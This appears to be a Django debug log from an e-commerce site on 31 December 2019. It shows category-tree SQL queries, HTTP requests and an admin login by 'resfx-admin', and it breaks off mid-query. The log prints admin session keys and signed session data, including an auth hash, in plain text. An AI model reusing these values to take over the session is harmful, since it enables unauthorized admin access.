20:30:36,056 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 20:30:36,060 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 20:30:36,064 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 20:30:36,068 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 20:30:36,073 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 20:30:36,079 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 20:30:36,082 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 20:30:36,087 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 20:30:36,091 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 20:30:36,095 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 20:30:36,101 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 20:30:36,105 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 20:30:36,109 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 20:30:36,113 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 20:30:36,118 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 20:30:36,122 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 20:30:36,127 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 20:30:36,131 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 20:30:36,135 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 20:30:36,140 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 20:30:36,144 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 20:30:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 20:33:31] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:43:17] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:48:20] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:53:23] "GET / HTTP/1.0" 302 0 [31/Dec/2019 20:58:26] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:06:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 21:06:59,418 utils 2749 140297212245760 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'delq5xitg6lmyi33rd1ahgt0tsadn6wj' LIMIT 1; args=('delq5xitg6lmyi33rd1ahgt0tsadn6wj',) DEBUG 2019-12-31 21:06:59,420 utils 2749 140297212245760 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('delq5xitg6lmyi33rd1ahgt0tsadn6wj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T21:06:59.418844+00:00'::timestamptz); args=('delq5xitg6lmyi33rd1ahgt0tsadn6wj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 21, 6, 59, 418844, tzinfo=)) [31/Dec/2019 21:06:59] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 21:06:59] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [31/Dec/2019 21:06:59] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [31/Dec/2019 21:06:59] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [31/Dec/2019 21:06:59] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 Not Found: /favicon.ico [31/Dec/2019 21:06:59] "GET /favicon.ico HTTP/1.0" 404 6346 [31/Dec/2019 21:06:59] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [31/Dec/2019 21:06:59] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 DEBUG 2019-12-31 21:07:08,869 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:07:08.859533+00:00'::timestamptz AND "django_session"."session_key" = 'delq5xitg6lmyi33rd1ahgt0tsadn6wj'); args=(datetime.datetime(2019, 12, 31, 21, 7, 8, 859533, tzinfo=), 'delq5xitg6lmyi33rd1ahgt0tsadn6wj') DEBUG 2019-12-31 21:07:08,872 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-31 21:07:09,096 utils 2749 140297222735616 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55' LIMIT 1; args=('o2yfo677d8pk63gonr6edzv77loija55',) DEBUG 2019-12-31 21:07:09,098 utils 2749 140297222735616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('o2yfo677d8pk63gonr6edzv77loija55', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T21:07:09.096931+00:00'::timestamptz); args=('o2yfo677d8pk63gonr6edzv77loija55', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 21, 7, 9, 96931, tzinfo=)) DEBUG 2019-12-31 21:07:09,100 utils 2749 140297222735616 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'delq5xitg6lmyi33rd1ahgt0tsadn6wj'; args=('delq5xitg6lmyi33rd1ahgt0tsadn6wj',) DEBUG 2019-12-31 21:07:09,103 utils 2749 140297222735616 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('delq5xitg6lmyi33rd1ahgt0tsadn6wj'); args=('delq5xitg6lmyi33rd1ahgt0tsadn6wj',) DEBUG 2019-12-31 21:07:09,107 utils 2749 140297222735616 (0.001) UPDATE "auth_user" SET "last_login" = '2019-12-31T21:07:09.104751+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 31, 21, 7, 9, 104751, tzinfo=), 6) DEBUG 2019-12-31 21:07:09,112 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:07:09.110183+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 7, 9, 110183, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:07:09] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-12-31 21:07:09,440 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:07:09.431084+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 7, 9, 431084, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:07:09,443 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:07:09,475 utils 2749 140297222735616 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:07:09,484 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:07:09.482500+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 7, 9, 482500, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:07:09] "GET / HTTP/1.0" 200 8208 [31/Dec/2019 21:07:09] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [31/Dec/2019 21:07:09] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [31/Dec/2019 21:07:09] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [31/Dec/2019 21:07:09] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [31/Dec/2019 21:07:09] "GET /favicon.ico HTTP/1.0" 404 6346 [31/Dec/2019 21:11:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 21:13:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 21:14:39,104 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:14:39.092235+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 14, 39, 92235, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:14:39,106 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:14:39,143 utils 2749 140297222735616 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:14:39,156 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:14:39.153974+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 14, 39, 153974, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:14:39] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 21:14:40,968 utils 2749 140297222735616 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:14:40.955283+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 14, 40, 955283, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:14:40,972 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:14:41,024 utils 2749 140297222735616 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:14:41,038 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:14:41.035867+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 14, 41, 35867, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:14:41] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 21:14:43,045 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:14:43.037072+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 14, 43, 37072, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:14:43,048 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-31 21:14:43,077 utils 2749 140297222735616 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-31 21:14:43,086 utils 2749 140297222735616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-14T21:14:43.084518+00:00'::timestamptz WHERE "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 14, 21, 14, 43, 84518, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') [31/Dec/2019 21:14:43] "GET / HTTP/1.0" 200 8208 DEBUG 2019-12-31 21:14:45,049 utils 2749 140297222735616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-31T21:14:45.040229+00:00'::timestamptz AND "django_session"."session_key" = 'o2yfo677d8pk63gonr6edzv77loija55'); args=(datetime.datetime(2019, 12, 31, 21, 14, 45, 40229, tzinfo=), 'o2yfo677d8pk63gonr6edzv77loija55') DEBUG 2019-12-31 21:14:45,051 utils 2749 140297222735616 (0.001) SELECT "auth_user"."id", "auth_user"."password", 